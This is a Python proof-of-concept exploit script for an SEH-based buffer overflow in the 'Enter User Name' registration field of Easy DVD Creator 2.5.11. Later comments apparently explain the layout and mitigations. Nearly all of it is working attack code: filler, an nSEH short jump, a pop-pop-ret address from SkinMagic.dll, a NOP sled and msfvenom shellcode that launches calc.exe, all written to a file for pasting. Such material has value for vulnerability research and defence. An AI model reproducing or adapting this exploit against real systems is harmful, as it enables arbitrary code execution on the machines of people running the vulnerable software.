#!/usr/bin/env python
# Exploit Title : Easy DVD Creator 2.5.11 - Buffer Overflow in 'Registration UserName Field' (SEH)
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovery Date : 29/07/2018
# Software Link : http://www.divxtodvd.net/dvd-creator.htm
# Tested Version : 2.5.11
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt".
# Just copy the text inside "exploit.txt" and start the Easy DVD Creator 2.5.11 program and click on "Register".
# In the third field i.e "Enter User Name" paste the content of "exploit.txt" and click on "OK". You will see a sweet calculator popped up.
# Greetz : @FuzzySec @LiveOverflow @hexachordanu
#
# Proof-of-concept layout, as assembled below: 996 bytes of filler, a 4-byte
# next-SEH slot, a 4-byte handler address, 16 NOPs, the encoded payload, then
# "C" padding so the whole string is exactly 1000 bytes.
# Defender's note: the handler address comes from SkinMagic.dll, which the
# author reports is loaded without SafeSEH or ASLR; that, together with an
# unbounded copy of the "Enter User Name" field, is what makes the overwrite
# usable. A length limit on that field, or shipping the DLL built with
# SafeSEH and ASLR, would each break this chain.
# Note: the "\xNN" escapes are meant as raw byte values (Python 2 str
# semantics); the file written at the end is binary-looking data, not text.

# Filler that reaches the SEH record (offset 996 per the length arithmetic below).
buffer = "\x41" * 996

#Short Jump address
# Overwrites the next-SEH pointer; the two trailing 0x90 bytes pad it to 4 bytes.
nseh = "\xeb\x06\x90\x90"

#0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, # v1.8.1.1 (C:\Program Files\Easy DVD Creator\SkinMagic.dll)
# Handler address 0x10037859 written little-endian.
seh= "\x59\x78\x03\x10"

#badchar \x00\x0a\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x0a\x0d' -f python
# Encoded payload as emitted by the msfvenom command above; 0x00, 0x0a and
# 0x0d are excluded because the author lists them as bad characters.
buf = ""
buf += "\xbf\x4d\xb3\x6b\x1e\xda\xda\xd9\x74\x24\xf4\x58\x33"
buf += "\xc9\xb1\x31\x31\x78\x13\x83\xe8\xfc\x03\x78\x42\x51"
buf += "\x9e\xe2\xb4\x17\x61\x1b\x44\x78\xeb\xfe\x75\xb8\x8f"
buf += "\x8b\x25\x08\xdb\xde\xc9\xe3\x89\xca\x5a\x81\x05\xfc"
buf += "\xeb\x2c\x70\x33\xec\x1d\x40\x52\x6e\x5c\x95\xb4\x4f"
buf += "\xaf\xe8\xb5\x88\xd2\x01\xe7\x41\x98\xb4\x18\xe6\xd4"
buf += "\x04\x92\xb4\xf9\x0c\x47\x0c\xfb\x3d\xd6\x07\xa2\x9d"
buf += "\xd8\xc4\xde\x97\xc2\x09\xda\x6e\x78\xf9\x90\x70\xa8"
buf += "\x30\x58\xde\x95\xfd\xab\x1e\xd1\x39\x54\x55\x2b\x3a"
buf += "\xe9\x6e\xe8\x41\x35\xfa\xeb\xe1\xbe\x5c\xd0\x10\x12"
buf += "\x3a\x93\x1e\xdf\x48\xfb\x02\xde\x9d\x77\x3e\x6b\x20"
buf += "\x58\xb7\x2f\x07\x7c\x9c\xf4\x26\x25\x78\x5a\x56\x35"
buf += "\x23\x03\xf2\x3d\xc9\x50\x8f\x1f\x87\xa7\x1d\x1a\xe5"
buf += "\xa8\x1d\x25\x59\xc1\x2c\xae\x36\x96\xb0\x65\x73\x68"
buf += "\xfb\x24\xd5\xe1\xa2\xbc\x64\x6c\x55\x6b\xaa\x89\xd6"
buf += "\x9e\x52\x6e\xc6\xea\x57\x2a\x40\x06\x25\x23\x25\x28"
buf += "\x9a\x44\x6c\x4b\x7d\xd7\xec\xa2\x18\x5f\x96\xba"

# NOP sled placed between the handler slot and the payload.
nops = "\x90" * 16

# Total length is pinned to 1000: the 8 is nseh + seh, and the remainder is
# "C" padding. If the pieces ever exceeded 1000 bytes the multiplier would go
# negative and Python yields an empty string, so the total would silently
# grow past 1000 rather than raise.
exploit = buffer + nseh + seh + nops + buf + "C" * (1000 - len(buffer) - 8 - len(nops) - len(buf))

# Output file; opened in text mode and closed explicitly (no context manager).
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()